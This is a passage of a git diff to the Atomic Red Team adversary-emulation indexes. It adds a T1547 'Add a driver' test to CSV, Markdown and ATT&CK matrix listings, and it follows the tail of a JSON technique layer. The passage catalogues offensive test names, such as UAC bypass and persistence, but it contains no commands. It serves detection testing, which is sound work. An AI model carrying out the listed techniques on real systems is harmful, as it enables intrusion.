Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1548.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555","score":100,"enabled":true,"links":[{"label":"View 
Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1556.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1556.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1557","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1562.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1563.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1566.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1569.001","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1571","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1572","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1573","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574.001","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":100,"enabled":true,"links":[{"label":"View 
Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.009","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1588.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1588.002/T1588.002.md"}]},{"techniqueID":"T1588","score":100,"enabled":true},{"techniqueID":"T1606.002","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1606","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1609","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1611","score":100,"enabled":true,"links":[{"label":"View Atomics","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]}]} \ No newline at end of file 
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 01e8bc05..e8436c52 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -165,6 +165,7 @@ privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection v privilege-escalation,T1053.001,At (Linux),1,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh privilege-escalation,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell +privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt privilege-escalation,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt privilege-escalation,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell privilege-escalation,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt 
@@ -632,6 +633,7 @@ persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6 persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt +persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index b504ab75..e18fe94d 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -108,6 +108,7 @@ privilege-escalation,T1546.011,Application Shimming,3,Registry key creation and/ privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt privilege-escalation,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt privilege-escalation,T1547.002,Authentication Package,1,Authentication Package,be2590e8-4ac3-47ac-b4b5-945820f2fbe9,powershell +privilege-escalation,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt privilege-escalation,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt privilege-escalation,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell privilege-escalation,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt @@ -428,6 +429,7 @@ persistence,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6 persistence,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt persistence,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt +persistence,T1547,Boot or Logon Autostart Execution,1,Add a driver,cb01b3da-b0e7-4e24-bf6d-de5223526785,command_prompt persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4abf-9a8c-4e8d47da9ee1,manual persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual 
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 599eca55..e2170ff3 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -271,7 +271,8 @@ - Atomic Test #1: At.exe Scheduled task [windows] - [T1547.002 Authentication Package](../../T1547.002/T1547.002.md) - Atomic Test #1: Authentication Package [windows] -- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) +- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md) + - Atomic Test #1: Add a driver [windows] - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md) - Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows] @@ -998,7 +999,8 @@ - Atomic Test #2: Bitsadmin Download (PowerShell) [windows] - Atomic Test #3: Persist, Download, & Execute [windows] - Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows] -- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) +- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md) + - Atomic Test #1: Add a driver [windows] - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1176 Browser Extensions](../../T1176/T1176.md) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 0b9cc997..bbea0278 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md 
@@ -198,7 +198,8 @@ - Atomic Test #1: At.exe Scheduled task [windows] - [T1547.002 Authentication Package](../../T1547.002/T1547.002.md) - Atomic Test #1: Authentication Package [windows] -- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) +- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md) + - Atomic Test #1: Add a driver [windows] - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1548.002 Bypass User Account Control](../../T1548.002/T1548.002.md) - Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows] @@ -709,7 +710,8 @@ - Atomic Test #2: Bitsadmin Download (PowerShell) [windows] - Atomic Test #3: Persist, Download, & Execute [windows] - Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows] -- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) +- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md) + - Atomic Test #1: Add a driver [windows] - T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1176 Browser Extensions](../../T1176/T1176.md) diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index 627b59a2..b19fcb7d 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md 
@@ -12,9 +12,9 @@ | [External Remote Services](../../T1133/T1133.md) | [Cron](../../T1053.003/T1053.003.md) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [Bypass User Account Control](../../T1548.002/T1548.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Container and Resource Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [RDP Hijacking](../../T1563.002/T1563.002.md) | Confluence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Deploy Container [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [CMSTP](../../T1218.003/T1218.003.md) | [Credential Stuffing](../../T1110.004/T1110.004.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Local Accounts](../../T1078.003/T1078.003.md) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [Authentication 
Package](../../T1547.002/T1547.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Groups](../../T1069.002/T1069.002.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Web Service](../../T1567/T1567.md) | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | -| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | +| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A 
TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Authentication Package](../../T1547.002/T1547.002.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials from Password Stores](../../T1555/T1555.md) | [Domain Trust Discovery](../../T1482/T1482.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Replication Through Removable Media](../../T1091/T1091.md) | Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | 